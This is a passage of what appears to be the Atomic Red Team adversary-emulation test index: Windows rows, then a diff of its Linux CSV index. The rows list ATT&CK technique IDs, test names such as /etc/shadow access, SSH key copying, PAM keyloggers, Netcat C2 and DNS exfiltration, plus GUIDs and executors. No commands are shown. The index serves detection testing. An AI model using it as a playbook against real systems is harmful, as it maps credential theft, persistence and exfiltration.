lateral-movement T1550.002 Pass the Hash 3 Invoke-WMIExec Pass the Hash f8757545-b00a-4e4e-8cfb-8cfb961ee713 powershell
645 lateral-movement T1550.003 Pass the Ticket 1 Mimikatz Kerberos Ticket Attack dbf38128-7ba7-4776-bedf-cc2eed432098 command_prompt
lateral-movement T1550.003 Pass the Ticket 2 Rubeus Kerberos Pass The Ticket a2fc4ec5-12c6-4fb4-b661-961f23f359cb powershell
646 lateral-movement T1563.002 RDP Hijacking 1 RDP hijacking a37ac520-b911-458e-8aed-c5f1576d9f46 command_prompt
647 lateral-movement T1021.001 Remote Desktop Protocol 1 RDP to DomainController 355d4632-8cb9-449d-91ce-b566d0253d3e powershell
648 lateral-movement T1021.001 Remote Desktop Protocol 2 RDP to Server 7382a43e-f19c-46be-8f09-5c63af7d3e2b powershell
lateral-movement T1021.001 Remote Desktop Protocol 3 Changing RDP Port to Non Standard Port via Powershell 2f840dd4-8a2e-4f44-beb3-6b2399ea3771 powershell
lateral-movement T1021.001 Remote Desktop Protocol 4 Changing RDP Port to Non Standard Port via Command_Prompt 74ace21e-a31c-4f7d-b540-53e4eb6d1f73 command_prompt
lateral-movement T1091 Replication Through Removable Media 1 USB Malware Spread Simulation d44b7297-622c-4be8-ad88-ec40d7563c75 powershell
649 lateral-movement T1021.002 SMB/Windows Admin Shares 1 Map admin share 3386975b-367a-4fbb-9d77-4dcf3639ffd3 command_prompt
650 lateral-movement T1021.002 SMB/Windows Admin Shares 2 Map Admin Share PowerShell 514e9cd7-9207-4882-98b1-c8f791bae3c5 powershell
651 lateral-movement T1021.002 SMB/Windows Admin Shares 3 Copy and Execute File with PsExec 0eb03d41-79e4-4393-8e57-6344856be1cf command_prompt
652 lateral-movement T1021.002 SMB/Windows Admin Shares 4 Execute command writing output to local Admin Share d41aaab5-bdfe-431d-a3d5-c29e9136ff46 command_prompt
lateral-movement T1072 Software Deployment Tools 1 Radmin Viewer Utility b4988cad-6ed2-434d-ace5-ea2670782129 command_prompt
653 lateral-movement T1021.006 Windows Remote Management 1 Enable Windows Remote Management 9059e8de-3d7d-4954-a322-46161880b9cf powershell
654 lateral-movement T1021.006 Windows Remote Management 2 Invoke-Command 5295bd61-bd7e-4744-9d52-85962a4cf2d6 powershell
655 lateral-movement T1021.006 Windows Remote Management 3 WinRM Access with Evil-WinRM efe86d95-44c4-4509-ae42-7bfd9d1f5b3d powershell
671 command-and-control T1105 Ingress Tool Transfer 11 OSTAP Worming Activity 2ca61766-b456-4fcf-a35a-1233685e1cad command_prompt
672 command-and-control T1105 Ingress Tool Transfer 12 svchost writing a file to a UNC path fa5a2759-41d7-4e13-a19c-e8f28a53566f command_prompt
673 command-and-control T1105 Ingress Tool Transfer 13 Download a File with Windows Defender MpCmdRun.exe 815bef8b-bf91-4b67-be4c-abe4c2a94ccc command_prompt
command-and-control T1105 Ingress Tool Transfer 14 whois file download c99a829f-0bb8-4187-b2c6-d47d1df74cab sh
command-and-control T1105 Ingress Tool Transfer 15 File Download via PowerShell 54a4daf1-71df-4383-9ba7-f1a295d8b6d2 powershell
command-and-control T1105 Ingress Tool Transfer 16 File download with finger.exe on Windows 5f507e45-8411-4f99-84e7-e38530c45d01 command_prompt
command-and-control T1105 Ingress Tool Transfer 17 Download a file with IMEWDBLD.exe 1a02df58-09af-4064-a765-0babe1a0d1e2 powershell
command-and-control T1105 Ingress Tool Transfer 18 Curl Download File 2b080b99-0deb-4d51-af0f-833d37c4ca6a command_prompt
command-and-control T1105 Ingress Tool Transfer 19 Curl Upload File 635c9a38-6cbf-47dc-8615-3810bc1167cf command_prompt
command-and-control T1105 Ingress Tool Transfer 20 Download a file with Microsoft Connection Manager Auto-Download d239772b-88e2-4a2e-8473-897503401bcc command_prompt
674 command-and-control T1090.001 Internal Proxy 1 Connection Proxy 0ac21132-4485-4212-a681-349e8a6637cd sh
675 command-and-control T1090.001 Internal Proxy 2 Connection Proxy for macOS UI 648d68c1-8bcd-4486-9abe-71c6655b6a2c sh
676 command-and-control T1090.001 Internal Proxy 3 portproxy reg key b8223ea9-4be2-44a6-b50a-9657a3d4e72a powershell
command-and-control T1090.003 Multi-hop Proxy 1 Psiphon 14d55ca0-920e-4b44-8425-37eedd72b173 powershell
command-and-control T1090.003 Multi-hop Proxy 2 Tor Proxy Usage - Windows 7b9d85e5-c4ce-4434-8060-d3de83595e69 powershell
command-and-control T1090.003 Multi-hop Proxy 3 Tor Proxy Usage - Debian/Ubuntu 5ff9d047-6e9c-4357-b39b-5cf89d9b59c7 sh
command-and-control T1090.003 Multi-hop Proxy 4 Tor Proxy Usage - MacOS 12631354-fdbc-4164-92be-402527e748da sh
677 command-and-control T1095 Non-Application Layer Protocol 1 ICMP C2 0268e63c-e244-42db-bef7-72a9e59fc1fc powershell
678 command-and-control T1095 Non-Application Layer Protocol 2 Netcat C2 bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37 powershell
679 command-and-control T1095 Non-Application Layer Protocol 3 Powercat C2 3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e powershell
680 command-and-control T1571 Non-Standard Port 1 Testing usage of uncommonly used port with PowerShell 21fe622f-8e53-4b31-ba83-6d333c2583f4 powershell
681 command-and-control T1571 Non-Standard Port 2 Testing usage of uncommonly used port 5db21e1d-dd9c-4a50-b885-b1e748912767 sh
command-and-control T1572 Protocol Tunneling 1 DNS over HTTPS Large Query Volume ae9ef4b0-d8c1-49d4-8758-06206f19af0a powershell
command-and-control T1572 Protocol Tunneling 2 DNS over HTTPS Regular Beaconing 0c5f9705-c575-42a6-9609-cbbff4b2fc9b powershell
command-and-control T1572 Protocol Tunneling 3 DNS over HTTPS Long Domain Query 748a73d5-cea4-4f34-84d8-839da5baa99c powershell
682 command-and-control T1219 Remote Access Software 1 TeamViewer Files Detected Test on Windows 8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0 powershell
683 command-and-control T1219 Remote Access Software 2 AnyDesk Files Detected Test on Windows 6b8b7391-5c0a-4f8c-baee-78d8ce0ce330 powershell
684 command-and-control T1219 Remote Access Software 3 LogMeIn Files Detected Test on Windows d03683ec-aae0-42f9-9b4c-534780e0f8e1 powershell
command-and-control T1219 Remote Access Software 4 GoToAssist Files Detected Test on Windows 1b72b3bd-72f8-4b63-a30b-84e91b9c3578 powershell
command-and-control T1219 Remote Access Software 5 ScreenConnect Application Download and Install on Windows 4a18cc4e-416f-4966-9a9d-75731c4684c0 powershell
command-and-control T1219 Remote Access Software 6 Ammyy Admin Software Execution 0ae9e327-3251-465a-a53b-485d4e3f58fa powershell
command-and-control T1219 Remote Access Software 7 RemotePC Software Execution fbff3f1f-b0bf-448e-840f-7e1687affdce powershell
685 command-and-control T1132.001 Standard Encoding 1 Base64 Encoded data. 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 sh
command-and-control T1132.001 Standard Encoding 2 XOR Encoded data. c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08 powershell
686 command-and-control T1071.001 Web Protocols 1 Malicious User Agents - Powershell 81c13829-f6c9-45b8-85a6-053366d55297 powershell
687 command-and-control T1071.001 Web Protocols 2 Malicious User Agents - CMD dc3488b0-08c7-4fea-b585-905c83b48180 command_prompt
688 command-and-control T1071.001 Web Protocols 3 Malicious User Agents - Nix 2d7c471a-e887-4b78-b0dc-b0df1f2e0658 sh
689 collection T1560 Archive Collected Data 1 Compress Data for Exfiltration With PowerShell 41410c60-614d-4b9d-b66e-b0192dd9c597 powershell
690 collection T1560.001 Archive via Utility 1 Compress Data for Exfiltration With Rar 02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0 command_prompt
691 collection T1560.001 Archive via Utility 2 Compress Data and lock with password for Exfiltration with winrar 8dd61a55-44c6-43cc-af0c-8bdda276860c command_prompt
692 collection T1560.001 Archive via Utility 3 Compress Data and lock with password for Exfiltration with winzip 01df0353-d531-408d-a0c5-3161bf822134 command_prompt
693 collection T1560.001 Archive via Utility 4 Compress Data and lock with password for Exfiltration with 7zip d1334303-59cb-4a03-8313-b3e24d02c198 command_prompt
694 collection T1560.001 Archive via Utility 5 Data Compressed - nix - zip c51cec55-28dd-4ad2-9461-1eacbc82c3a0 sh
695 collection T1560.001 Archive via Utility 6 Data Compressed - nix - gzip Single File cde3c2af-3485-49eb-9c1f-0ed60e9cc0af sh
696 collection T1560.001 Archive via Utility 7 Data Compressed - nix - tar Folder or File 7af2b51e-ad1c-498c-aca8-d3290c19535a sh
697 collection T1560.001 Archive via Utility 8 Data Encrypted with zip and gpg symmetric 0286eb44-e7ce-41a0-b109-3da516e05a5f sh
698 collection T1123 Audio Capture 1 using device audio capture commandlet 9c3ad250-b185-4444-b5a9-d69218a10c95 powershell
699 collection T1119 Automated Collection 1 Automated Collection Command Prompt cb379146-53f1-43e0-b884-7ce2c635ff5b command_prompt
700 collection T1119 Automated Collection 2 Automated Collection PowerShell 634bd9b9-dc83-4229-b19f-7f83ba9ad313 powershell
701 collection T1119 Automated Collection 3 Recon information for export with PowerShell c3f6d794-50dd-482f-b640-0384fbb7db26 powershell
702 collection T1119 Automated Collection 4 Recon information for export with Command Prompt aa1180e2-f329-4e1e-8625-2472ec0bfaf3 command_prompt
703 collection T1115 Clipboard Data 1 Utilize Clipboard to store or execute commands from 0cd14633-58d4-4422-9ede-daa2c9474ae7 command_prompt
704 collection T1115 Clipboard Data 2 Execute Commands from Clipboard using PowerShell d6dc21af-bec9-4152-be86-326b6babd416 powershell
705 collection T1115 Clipboard Data 3 Execute commands from clipboard 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff bash
706 collection T1056.004 Credential API Hooking 1 Hook PowerShell TLS Encrypt/Decrypt Messages de1934ea-1fbf-425b-8795-65fb27dd7e33 powershell
707 collection T1056.002 GUI Input Capture 1 AppleScript - Prompt User for Password 76628574-0bc1-4646-8fe2-8f4427b47d15 bash
708 collection T1056.002 GUI Input Capture 2 PowerShell - Prompt User for Password 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 powershell
709 collection T1056.001 Keylogging 1 Input Capture d9b633ca-8efb-45e6-b838-70f595c6ae26 powershell
710 collection T1074.001 Local Data Staging 1 Stage data from Discovery.bat 107706a5-6f9f-451a-adae-bab8c667829f powershell
711 collection T1074.001 Local Data Staging 2 Stage data from Discovery.sh 39ce0303-ae16-4b9e-bb5b-4f53e8262066 bash
712 collection T1074.001 Local Data Staging 3 Zip a Folder with PowerShell for Staging in Temp a57fbe4b-3440-452a-88a7-943531ac872a powershell
713 collection T1114.001 Local Email Collection 1 Email Collection with PowerShell Get-Inbox 3f1b5096-0139-4736-9b78-19bcb02bb1cb powershell
714 collection T1113 Screen Capture 1 Screencapture 0f47ceb1-720f-4275-96b8-21f0562217ac bash
715 collection T1113 Screen Capture 2 Screencapture (silent) deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4 bash
716 collection T1113 Screen Capture 3 X Windows Capture 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac bash
717 collection T1113 Screen Capture 4 Capture Linux Desktop using Import Tool 9cd1cccb-91e4-4550-9139-e20a586fcea1 bash
718 collection T1113 Screen Capture 5 Windows Screencapture 3c898f62-626c-47d5-aad2-6de873d69153 powershell
719 exfiltration T1020 Automated Exfiltration 1 IcedID Botnet HTTP PUT 9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0 powershell
720 exfiltration T1030 Data Transfer Size Limits 1 Data Transfer Size Limits ab936c51-10f4-46ce-9144-e02137b2016a sh
721 exfiltration T1048 Exfiltration Over Alternative Protocol 1 Exfiltration Over Alternative Protocol - SSH f6786cc8-beda-4915-a4d6-ac2f193bb988 sh
722 exfiltration T1048 Exfiltration Over Alternative Protocol 2 Exfiltration Over Alternative Protocol - SSH 7c3cb337-35ae-4d06-bf03-3032ed2ec268 sh
exfiltration T1048 Exfiltration Over Alternative Protocol 3 DNSExfiltration (doh) c943d285-ada3-45ca-b3aa-7cd6500c6a48 powershell
exfiltration T1048.002 Exfiltration Over Asymmetric Encrypted Non-C2 Protocol 1 Exfiltrate data HTTPS using curl windows 1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0 command_prompt
exfiltration T1048.002 Exfiltration Over Asymmetric Encrypted Non-C2 Protocol 2 Exfiltrate data HTTPS using curl linux 4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01 bash
exfiltration T1041 Exfiltration Over C2 Channel 1 C2 Data Exfiltration d1253f6e-c29b-49dc-b466-2147a6191932 powershell
723 exfiltration T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 1 Exfiltration Over Alternative Protocol - HTTP 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff manual
724 exfiltration T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 2 Exfiltration Over Alternative Protocol - ICMP dd4b4421-2e25-4593-90ae-7021947ad12e powershell
725 exfiltration T1048.003 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol 3 Exfiltration Over Alternative Protocol - DNS c403b5a4-b5fc-49f2-b181-d1c80d27db45 manual
726 exfiltration initial-access T1048.003 T1078.001 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol Default Accounts 4 1 Exfiltration Over Alternative Protocol - HTTP Enable Guest account with RDP capability and admin priviliges 6aa58451-1121-4490-a8e9-1dada3f1c68c 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 powershell command_prompt
727 exfiltration initial-access T1048.003 T1566.001 Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol Spearphishing Attachment 5 1 Exfiltration Over Alternative Protocol - SMTP Download Phishing Attachment - VBScript ec3a835e-adca-4c7c-88d2-853b69c11bb9 114ccff9-ae6d-4547-9ead-4cd69f687306 powershell
exfiltration T1567 Exfiltration Over Web Service 1 Data Exfiltration with ConfigSecurityPolicy 5568a8f4-a8b1-4c40-9399-4969b642f122 powershell
initial-access T1078.004 Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e gcloud
initial-access T1078.001 Default Accounts 1 Enable Guest account with RDP capability and admin privileges 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 command_prompt
initial-access T1078.001 Default Accounts 2 Activate Guest Account aa6cb8c4-b582-4f8e-b677-37733914abda command_prompt
initial-access T1133 External Remote Services 1 Running Chrome VPN Extensions via the Registry 2 vpn extension 4c8db261-a58b-42a6-a866-0a294deedde4 powershell
initial-access T1078.003 Local Accounts 1 Create local account with admin privileges a524ce99-86de-4db6-b4f9-e08f35a47a15 command_prompt
initial-access T1078.003 Local Accounts 2 Create local account with admin privileges - MacOS f1275566-1c26-4b66-83e3-7f9f7f964daa bash
initial-access T1091 Replication Through Removable Media 1 USB Malware Spread Simulation d44b7297-622c-4be8-ad88-ec40d7563c75 powershell
initial-access T1566.001 Spearphishing Attachment 1 Download Macro-Enabled Phishing Attachment 114ccff9-ae6d-4547-9ead-4cd69f687306 powershell
728 initial-access T1566.001 Spearphishing Attachment 2 Word spawned a command shell and used an IP address in the command line cbb6799a-425c-4f83-9194-5447a909d67f powershell
atomics/Indexes/Indexes-CSV/linux-index.csv
+43 -164
View File
@@ -1,80 +1,42 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
credential-access,T1003.008,/etc/passwd and /etc/shadow,1,Access /etc/shadow (Local),3723ab77-c546-403c-8fb4-bb577033b235,bash
credential-access,T1003.008,/etc/passwd and /etc/shadow,2,Access /etc/passwd (Local),60e860b6-8ae6-49db-ad07-5e73edd88f5d,sh
credential-access,T1003.008,/etc/passwd and /etc/shadow,3,"Access /etc/{shadow,passwd} with a standard bin that's not cat",df1a55ae-019d-4120-bc35-94f4bc5c4b0a,bash
credential-access,T1003.008,/etc/passwd and /etc/shadow,4,"Access /etc/{shadow,passwd} with shell builtins",f5aa6543-6cb2-4fae-b9c2-b96e14721713,bash
credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
credential-access,T1552.007,Container API,1,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
credential-access,T1552.007,Container API,2,Cat the contents of a Kubernetes service account token file,788e0019-a483-45da-bcfe-96353d46820f,sh
credential-access,T1110.004,Credential Stuffing,1,SSH Credential Stuffing From Linux,4f08197a-2a8a-472d-9589-cd2895ef22ad,bash
credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
credential-access,T1552.001,Credentials In Files,5,Find and Access Github Credentials,da4f751a-020b-40d7-b9ff-d433b7799803,bash
credential-access,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
credential-access,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
credential-access,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh
credential-access,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
credential-access,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
credential-access,T1110.001,Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell
credential-access,T1110.001,Password Guessing,4,SUDO brute force Debian,464b63e8-bf1f-422e-9e2c-2aa5080b6f9a,sh
credential-access,T1110.001,Password Guessing,5,SUDO brute force Redhat,b72958a7-53e3-4809-9ee1-58f6ecd99ade,sh
credential-access,T1110.003,Password Spraying,4,Password spray all Azure AD users with a single password,a8aa2d3e-1c52-4016-bc73-0f8854cfa80a,powershell
credential-access,T1556.003,Pluggable Authentication Modules,1,Malicious PAM rule,4b9dde80-ae22-44b1-a82a-644bf009eb9c,sh
credential-access,T1556.003,Pluggable Authentication Modules,2,Malicious PAM module,65208808-3125-4a2e-8389-a0a00e9ab326,sh
credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
credential-access,T1552.004,Private Keys,5,Copy the users GnuPG directory with rsync,2a5a0601-f5fb-4e2e-aa09-73282ae6afca,sh
credential-access,T1003.007,Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh
credential-access,T1003.007,Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh
credential-access,T1003.007,Proc Filesystem,3,Capture Passwords with MimiPenguin,a27418de-bdce-4ebd-b655-38f04842bf0c,bash
credential-access,T1606.002,SAML Tokens,1,Golden SAML,b16a03bc-1089-4dcc-ad98-30fe8f3a2b31,powershell
collection,T1560.002,Archive via Library,1,Compressing data using GZip in Python (Linux),391f5298-b12d-4636-8482-35d9c17d53a8,bash
collection,T1560.002,Archive via Library,2,Compressing data using bz2 in Python (Linux),c75612b2-9de0-4d7c-879c-10d7b077072d,bash
collection,T1560.002,Archive via Library,3,Compressing data using zipfile in Python (Linux),001a042b-859f-44d9-bf81-fd1c4e2200b0,bash
collection,T1560.002,Archive via Library,4,Compressing data using tarfile in Python (Linux),e86f1b4b-fcc1-4a2a-ae10-b49da01458db,bash
collection,T1560.001,Archive via Utility,5,Data Compressed - nix - zip,c51cec55-28dd-4ad2-9461-1eacbc82c3a0,sh
collection,T1560.001,Archive via Utility,6,Data Compressed - nix - gzip Single File,cde3c2af-3485-49eb-9c1f-0ed60e9cc0af,sh
collection,T1560.001,Archive via Utility,7,Data Compressed - nix - tar Folder or File,7af2b51e-ad1c-498c-aca8-d3290c19535a,sh
collection,T1560.001,Archive via Utility,8,Data Encrypted with zip and gpg symmetric,0286eb44-e7ce-41a0-b109-3da516e05a5f,sh
collection,T1056.001,Keylogging,2,Living off the land Terminal Input Capture on Linux with pam.d,9c6bdb34-a89f-4b90-acb1-5970614c711b,sh
collection,T1056.001,Keylogging,3,Logging bash history to syslog,0e59d59d-3265-4d35-bebd-bf5c1ec40db5,sh
collection,T1056.001,Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh
collection,T1056.001,Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh
collection,T1056.001,Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh
collection,T1074.001,Local Data Staging,2,Stage data from Discovery.sh,39ce0303-ae16-4b9e-bb5b-4f53e8262066,bash
collection,T1113,Screen Capture,3,X Windows Capture,8206dd0c-faf6-4d74-ba13-7fbe13dce6ac,bash
collection,T1113,Screen Capture,4,Capture Linux Desktop using Import Tool,9cd1cccb-91e4-4550-9139-e20a586fcea1,bash
privilege-escalation,T1546.004,.bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
privilege-escalation,T1546.004,.bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
privilege-escalation,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
privilege-escalation,T1078.004,Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,gcloud
privilege-escalation,T1053.007,Container Orchestration Job,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
privilege-escalation,T1053.007,Container Orchestration Job,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
privilege-escalation,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
privilege-escalation,T1053.003,Cron,2,Cron - Add script to all cron subfolders,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
privilege-escalation,T1053.003,Cron,3,Cron - Add script to /var/spool/cron/crontabs/ folder,2d943c18-e74a-44bf-936f-25ade6cccab4,bash
privilege-escalation,T1484.002,Domain Trust Modification,1,Add Federation to Azure AD,8906c5d0-3ee5-4f63-897a-f6cafd3fdbb7,powershell
privilege-escalation,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
privilege-escalation,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter container escape,0b2f9520-a17a-4671-9dba-3bd034099fff,sh
privilege-escalation,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
privilege-escalation,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
privilege-escalation,T1037.004,RC Scripts,2,rc.common,c33f3d80-5f04-419b-a13a-854d1cbdbf3a,bash
privilege-escalation,T1037.004,RC Scripts,3,rc.local,126f71af-e1c9-405c-94ef-26a47b16c102,bash
privilege-escalation,T1574.006,LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
privilege-escalation,T1574.006,LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
privilege-escalation,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
privilege-escalation,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
privilege-escalation,T1548.001,Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
privilege-escalation,T1548.001,Setuid and Setgid,4,Make and modify capabilities of a binary,db53959c-207d-4000-9e7a-cd8eb417e072,sh
privilege-escalation,T1548.001,Setuid and Setgid,5,Provide the SetUID capability to a file,1ac3272f-9bcf-443a-9888-4b1d3de785c1,sh
privilege-escalation,T1548.003,Sudo and Sudo Caching,1,Sudo usage,150c3a08-ee6e-48a6-aeaf-3659d24ceb4e,sh
privilege-escalation,T1548.003,Sudo and Sudo Caching,2,Unlimited sudo cache timeout,a7b17659-dd5e-46f7-b7d1-e6792c91d0bc,sh
privilege-escalation,T1548.003,Sudo and Sudo Caching,3,Disable tty_tickets for sudo caching,91a60b03-fb75-4d24-a42e-2eb8956e8de1,sh
privilege-escalation,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
privilege-escalation,T1543.002,Systemd Service,2,"Create Systemd Service file, Enable the service , Modify and Reload the service.",c35ac4a8-19de-43af-b9f8-755da7e89c89,bash
privilege-escalation,T1053.006,Systemd Timers,1,Create Systemd Service and Timer,f4983098-bb13-44fb-9b2c-46149961807b,bash
privilege-escalation,T1053.006,Systemd Timers,2,Create a user level transient systemd service and timer,3de33f5b-62e5-4e63-a2a0-6fd8808c80ec,sh
privilege-escalation,T1053.006,Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
privilege-escalation,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
privilege-escalation,T1546.004,Unix Shell Configuration Modification,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
privilege-escalation,T1546.004,Unix Shell Configuration Modification,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
persistence,T1546.004,.bash_profile and .bashrc,1,Add command to .bash_profile,94500ae1-7e31-47e3-886b-c328da46872f,sh
persistence,T1546.004,.bash_profile and .bashrc,2,Add command to .bashrc,0a898315-4cfa-4007-bafe-33a4646d115f,sh
persistence,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual
persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
persistence,T1053.003,Cron,1,Cron - Replace crontab with referenced file,435057fb-74b1-410e-9403-d81baf194f75,bash
persistence,T1053.003,Cron,2,Cron - Add script to cron folder,b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0,bash
persistence,T1547.006,Kernel Modules and Extensions,1,Linux - Load Kernel Module via insmod,687dcb93-9656-4853-9c36-9977315e9d23,bash
persistence,T1574.006,LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
persistence,T1574.006,LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
persistence,T1136.001,Local Account,1,Create a user account on a Linux system,40d8eabd-e394-46f6-8785-b9bfa1d011d2,bash
persistence,T1136.001,Local Account,5,Create a new user in Linux with `root` UID and GID.,a1040a30-d28b-4eda-bd99-bb2861a4616c,bash
persistence,T1098.004,SSH Authorized Keys,1,Modify SSH Authorized Keys,342cc723-127c-4d3a-8292-9c0c6b4ecadc,bash
persistence,T1543.002,Systemd Service,1,Create Systemd Service,d9e4f24f-aa67-4c6e-bcbf-85622b697a7c,bash
persistence,T1546.005,Trap,1,Trap,a74b2e07-5952-4c03-8b56-56274b076b61,sh
credential-access,T1552.003,Bash History,1,Search Through Bash History,3cfde62b-7c33-4b26-a61e-755d6131c8ce,sh
credential-access,T1552.001,Credentials In Files,2,Extract passwords with grep,bd4cf0d1-7646-474e-8610-78ccf5a097c4,sh
credential-access,T1040,Network Sniffing,1,Packet Capture Linux,7fe741f7-b265-4951-a7c7-320889083b3e,bash
credential-access,T1552.004,Private Keys,2,Discover Private SSH Keys,46959285-906d-40fa-9437-5a439accd878,sh
credential-access,T1552.004,Private Keys,3,Copy Private SSH Keys with CP,7c247dc7-5128-4643-907b-73a76d9135c3,sh
credential-access,T1552.004,Private Keys,4,Copy Private SSH Keys with rsync,864bb0b2-6bb5-489a-b43b-a77b3a16d68a,sh
defense-evasion,T1027.001,Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
defense-evasion,T1070.003,Clear Command History,1,Clear Bash history (rm),a934276e-2be5-4a36-93fd-98adbb5bd4fc,sh
defense-evasion,T1070.003,Clear Command History,2,Clear Bash history (echo),cbf506a5-dd78-43e5-be7e-a46b7c7a0a11,sh
@@ -84,49 +46,27 @@ defense-evasion,T1070.003,Clear Command History,5,Clear Bash history (truncate),
defense-evasion,T1070.003,Clear Command History,6,Clear history of a bunch of shells,7e6721df-5f08-4370-9255-f06d8a77af4c,sh
defense-evasion,T1070.003,Clear Command History,7,Clear and Disable Bash History Logging,784e4011-bd1a-4ecd-a63a-8feb278512e6,sh
defense-evasion,T1070.003,Clear Command History,8,Use Space Before Command to Avoid Logging to History,53b03a54-4529-4992-852d-a00b4b7215a6,sh
defense-evasion,T1070.003,Clear Command History,9,Disable Bash History Logging with SSH -T,5f8abd62-f615-43c5-b6be-f780f25790a1,sh
